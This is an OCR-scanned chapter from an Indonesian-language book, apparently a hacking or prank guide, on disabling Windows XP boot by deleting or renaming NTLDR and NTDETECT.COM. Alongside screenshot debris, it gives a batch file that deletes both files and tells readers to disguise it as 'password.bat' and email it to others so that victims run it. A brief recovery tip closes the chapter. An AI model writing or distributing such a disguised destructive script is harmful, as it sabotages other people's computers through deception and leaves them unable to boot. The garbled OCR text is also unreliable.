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Ada satu atau dua file Windows yang rentan untuk dimanipulasi. File tersebut 
ada di root directory. Dengan tidak adanya file ini, dapat dipastikan sistem 
operasi Windows akan gagal di-boot sejak awal komputer dihidupkan. 


Ini adalah trik kuno yang kerapkali dieksploitasi oleh beberapa virus maker 
(Vx), dan untuk menambah pengetahuan, saya pikir tidak ada salahnya saya tulis 
lagi. 


31 Mencari Fire NTLDR 


Target file yang kita cari adalah file yang bernama NTLDR. Letaknya ada di 
root. 


Oke! Kita panggil Windows Explorer dan melihat root directory sistem. 
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File Edit View Favorites Tools Help 
@ sak "“ & # ) Search (35 Folders El 
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Xx Name Type - Date Modified N 








Folders 


(B3 besktop | Gixautorun.inf File Folder 8/2/2009 2:30 PM 
& a@ My Documents (MD XXxxpmd File Folder 35/20/2009 11:11 PM 


8 4 My Computer Or File Folder 10/28/2008 12:53 AM 
Be cybersufi (C1) Dyes File Folder 8/25/2010 12:46 AM 
Fa xp (D:) (SI wdsuef.dmp DMP File 7/20/2008 11:32 AM 
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G5 DVD Drive (3:) 3 MSDOS,SYS System file 7/20/2008 10:54 AM 
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Gambar 3.1. Root directory 


Apa yang terjadi? Saat kita teliti ternyata file yang kita cari tidak dikete- 
mukan. Error? Tidak! Memang seharusnya begitu...9 Jika setingan 
Windows Explorer kita masih standar, file tersebut tidak akan terlihat, karena 
ia mempunyai sifat hidden dan system. Alias tersembunyi. Untuk dapat 
melihatnya, kita akan membuka kuncian tersebut. 








Sei ana, Menawan ea 
IE wdsuef.dmp OKB DMP File 7/20/2008 11:32 AM 
FSlautorun.bat 1KB MS-DOS Batch File #/12/2009 2:32 PM 
(SJ PDOXUSRS.NET 13KB NET File 3/16/2010 12:25 PM 
o.srs OKB System file 7/20/2008 10:54 AM 
Isi MsDos.sys » OKB System file 7120/2008 10:54 AM 

E arm errors.log 1KB Text Document 9/24/2008 10:27 PM 
9 (Eltreeinfo.wc 76KB WC File 7/21/2008 11:17 PM | 
1GB) 88.8 KB "4 My Computer 


Gambar 3.2. File yang dicari tidak diketemukan 


Syarat pertama agar dapat melihat file terlarang NTLDR adalah kita harus 
mematikan kuncian Folder Options. Panggil Windows Explorer dan aktifkan 
pilihan Folder Options via menu bar Tools. 
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File Edit View  Fayorites Help 








Map Network Drive... 
9 Pn | Bj Disconnect Network Drive... I- 
—. Synchronize... 
Address | Ca 
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Gambar 3.3. Mengaktifkan folder options 


Jendela Folder Options akan tampil dengan beberapa tab pilihan. Klik Tab 
View. Perhatikan pada bagian Advanced settings. Di sana banyak sekali 
pengaturan yang berhubungan erat dengan Windows Explorer yang kita pakai. 


Folder Options 





| General | View | File Types || Offline Files L 





Folder views 


, You can apply the view (such as Details or Tiles) that 
| mn you are using for this folder to all folders. 


Apply to All Folders Reset All Folders 


Advanced settings: 


CJ Display the contents of system folders 

(R1 Display the full path in the address bar 

CJ Display the full path in the title bar 

CJ Do not cache thumbnails 

(& Hidden files and folders 

@ Do not show hidden files and folders 

O Show hidden files and folders 

CJ Hide extensions for known file tupes 

Hide protected operating system files (Recommended) 
CJ Launch folder windows in a separate process 

(5) Managing pairs of Web pages and folders 

(@ Show and manage the pair as a sinale file 2 


Restore Defaults 
OK Cancel 





























Gambar 3.4. Folder Options tab View 


Klik pilihan Show hidden files and folders sehingga aktif terpilih. 


(#) Display the full path in the address bar 
CJ Display the full path in the title bar 
C7) Do not cache thumbnail 
(& Hidden files and folders 
O Do not show hidden files and folders 
@ 
Hj) Hide extensions for known file tupes Da 
Hide protected operating system files (Recommended) 


1 PT SN | Sa | 


Gambar 3.5. Pilihan show hidden files and folders 


Pengaktifan pilihan ini bertujuan untuk menampilkan file atau folder yang 
tersembunyi (hidden) secara normal pada Windows. Namun hanya dengan cara 
ini, file yang kita inginkan belumlah muncul. Karena file tersebut selain bersifat 
hidden (tersembunyi) ia juga bersifat system (embahnya hidden.. 9). Oleh 
karena itu, kita harus menyesuaikan pengaturan lagi untuk menampilkan file 
sistem. 


Caranya? Hilangkan centang pada pilihan Hide protected operating system 
(Recommended). 


(DS Hidden files and folders 
O Do not show hidden files and folders 
@ Show hidden files and folders 
CJ Hide extensions for known file tupes 
Ci 
CJ Launch folder windows in a separate process 
(Y Managing pairs of Web pages and folders 
(@ Show and manage the pair as a single file “ 


Gambar 3.6. Pilihan Hide protected operating .... 











Jika muncul pesan peringatan dari Windows, yang menakuti-nakuti kita, 
abaikan saja. Tetap dengan tenang memilih Yes. Lalu klik Apply dan OK. 
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Warning 


N You have chosen to display protected operating system files (files labeled System and Hidden) in Windows Explorer, 


These files are reguired to start and run Windows, Deleting or editing them can make your computer inoperable, 
Are you sure you want to display these files? 





Gambar 3.7. Pesan peringatan 


Selesailah sudah! Dengan pengaturan tersebut tidak ada lagi file yang disem- 
bunyikan oleh Windows. Artinya, file system yang kita cari akan terlihat .. & 


Sekarang kita kembali panggil Windows Explorer. Perhatikan! Di sana akan 
muncul seluruh file yang ada tanpa terkecuali. File-file hidden dan system 
akan terlihat berwarna samar (grey). 
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v0 Ind So 
X Name Size Type « Date Modified N 
Dry File Folder 10/28/2008 12:53 AM 
& (M9) My Documents (yes File Folder 83/25/2010 12:46 AM 
8 4 My Computer 5 Boot. BAK BAK File 3/28/2010 8:51 PM 
& Sos) ' BOOTSECT.BAK BAK File 3/28/2010 9:17 PM 
Be xP (D3) “ boot.ini Configuration Settings 8/17/2010 11:06 AM 
H &@ Local Disk (E!) IS) wdsuef,dmp DMP File 7/20/2008 11:32 AM 
H & Local Disk (F3) 5 win? Id LD File 3/28/2010 8:36 PM 
| & DVD Drive (G) “INTDETECT.COM MS-DOS Application — 8/3/2004 8:38 PM 
3. DVD Drive (In) AUTOEXEC.BAT MS-DOS Batch File — 11/26/2009 9:36 PM 
J & Control Panel autorun.bat MS-DOS Batch File 6/12/2009 2:32 PM 
B (& css Documents PDOXUSRS.NET NET File 3/16/2010 12:25 PM 
H3 3 Nokia Phone Browser il Boot.ini.saved SAVED File 12/4/2009 1:18 PM 
@ (69 Shared Documents Sl bootmgr System file 7114/2009 8:39 AM 
B (3 css Documents SS CONFIG.SYs System file 7/20/2008 10:54 AM 
BG My Network Places SS) arldr System file 3/28/2010 8:36 PM 
AJ Recycle Bin Sio.svs System file 7/20/2008 10:54 AM 
(3 game Ismsbos.svs System file 7120/2008 10:54 AM 
(3 gametitah Si ntldr System file 8/3/2004 8:59 PM 
B (5 Tools E arm errors.log Text Document 9124/2008 10:27 PM 
treeinfo.wc WC File 7/21/2008 11:17 PM 

















61 objects (Disk Free space: 4.51 GB) 2 My Computer 





Gambar 3.8. Data di root directory terlihat semua 


Coba, telitilah! Seharusnya di sana ada file yang bernama NTLDR. Itulah file 
target kita. 
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Lalu apa yang harus kita lakukan dengan file tersebut? Ya .. 
harus dibuat menjadi tidak ada. Cara tergampang adalah dengan meng- 
hapusnya. Atau, jika mau sedikit halus, kita dapat sekadar melakukan ganti 
nama (rename) file tersebut dengan sembarang nama. Misalnya dari ntldr kita 





yes File Folder 85/25/2010 12:46 AM 
"SI Boot. BAK 1KB BAK File 3/28/2010 8:51 PM 
| BOOTSECT.BAK BKB BAK File 31/28/2010 9:17 PM 
boot.ini 1KB Configuration Settings 8/17/2010 11:06 AM 
(E) wdsuef.dmp OKB DMP File 7120/2008 11:32 AM 
Sl win? .Id 1KB LD Fi 3/28/2010 8:36 PM 
(INTDETECT.COM 47KB MS-DOS Application 8/3/2004 8:38 PM 
(SJ AUTOEXEC.BAT OKB MS-DOS Batch File 11/26/2009 9:36 PM 
FSlautorun.bat 1KB MS-DOS Batch File 6/12/2009 2:32 PM 
Ira PDOXUSRS.NET 13KB NET File 3/16/2010 12:25 PM 
"SI Boot.ini.sayed 1KB SAVED File 12/4/2009 1:18 PM 
"SI bootmgr 375KB System file 7114/2009 8:39 AM 
3 CONFIG.SYS OKB System file 7120/2008 10:54 AM 
5S grldr 199KB System file 3/28/2010 8:36 PM 
o.sys OKB System File 7120/2008 10:54 AM 
ES MSDOS,SYS OKB System file 7/20/2008 10:54 AM 
al ntldr | IN 245 KB System file 813/2004 8:59 PM 
AI arm errors.log 1KB Text Document 9/24/2008 10:27 PM 
3 treeinfo.wc 76KB WC File 7/21/2008 11:17 PM 
244 KB 4 My Computer 


Gambar 3.9. File NTLDR ditemukan 


ganti dengan nama xntldr atau Idr atau terserah Sampeyanlah.... 


Coba hapus atau rename file tersebut, dan booting komputer. Proses booting 
akan gagal me-load sistem operasi Windows dan menampilkan pesan: 
NTLDR is missing... 


Dan komputer menjadi Hang ... Windows telah tewas seketika .... & 


3.2 MEMBUNUH DENGAN CARA LAIN 


Selain file NTLDR ada juga file lain yang dapat kita manipulasi, yang dapat 
menyebabkan kematian Windows dengan cara yang mirip. File tersebut 
bernama NTDETECT.COM. File ini juga dipakai Windows dalam rangka 


booting. 
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. file tersebut 


(Dyes 

ISI Boot. BAK 

SI BOOTSECT.BAK 
boot.ini 

(rel . wdsuef.dmp 

Sl win? Id 

Ii NTDETECT.COM | 

(SIAUTOEXEC.BAT IN 

Flautorun.bat 

(BI PDOXUSRS.NET 

ISI Boot.ini.sayed 


pan) IL - » tao —. 





File Folder 

BAK File 

BAK File 
Configuration Settings 
DMP File 

LD File 

MS-DOS Application 
MS-DOS Batch File 
MS-DOS Batch File 
NET File 

SAVYED File 


ea aa 


Gambar 3.10. NTDETECT.COM 


j2: 
Size 
Size 
81: 
Fizt 
Size 
8/3j 
li: 
6j1: 
3f1t 
12j: 


Ta. 


Caranya sama saja. Hapus atau ganti nama file tersebut. Proses gagal booting 
ke Windows akan terjadi. Hanya saja pesan yang ditampilkan akan lain. & 


Jika Anda termasuk tipe maniak yang kejam, tentu saja dapat menghapus 
kedua file tersebut tanpa basa-basi lagi. Capek deh...! 


3.3  MENYEDERHANAKAN PEMBUNUHAN 


Untuk mempercepat dan mempermudah pembunuhan dengan metode kasar 
ini, kita dapat membuat suatu file BAT (batch file). Buka Notepad, dan 


ketikkan data sebagai berikut: 
Echo off 

Del c-ntldr 

Del c-ntdetect.com 


Simpan dengan nama yang menarik hati. 


Misalnya 


password.bat, atau ... terserah dengan kreativitas Sampeyan. 





Echo off 
bel c:Antldr 


Bl password.bat - Notepad 
File Edit MEN View Help 


Del c:“ntdetect. com 


Gambar 3.11. Isi file bat jebakan 


passcode.bat, 
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Yang penting dapat memancing minat orang sok pengin tahu untuk 
menjalankannya. Hehehe... 9 


Kirim file BAT tersebut ke orang lain, via email misalnya. Jika pemakai 
mengklik ganda atau menjalankan file tersebut, Wasallam... mati sudah 
Windows! 


Bagaimana mengatasi masalah ini? Seperti yang sudah-sudah ... saya tidak 
akan menjawabnya. Coba pecahkan sendiri. Sebetulnya gampang kok, entah 
bagaimana caranya, Anda cukup mencari file-file tersebut dari CD Windows 
(atau sumber lainnya) dan mengopinya ke lokasi root. Masalah selesai! Tapi 
... tetap saja kena duluan. 


SKAK MAT!!! 





Untuk mengatasi masalah ini, entah bagaimana caranya, 
Anda harus dapat mengembalikan file NTLDR dan 
NTDETECT.COM yang telah hilang atau terhapus ter- 
sebut. 





Anda dapat memakai CD Windows dan mengambil kedua 
file yang rusak/hilang tersebut dari CD. Atau kopi file dari komputer lain 
yang masih sehat dan kopi ke komputer yang bermasalah. 
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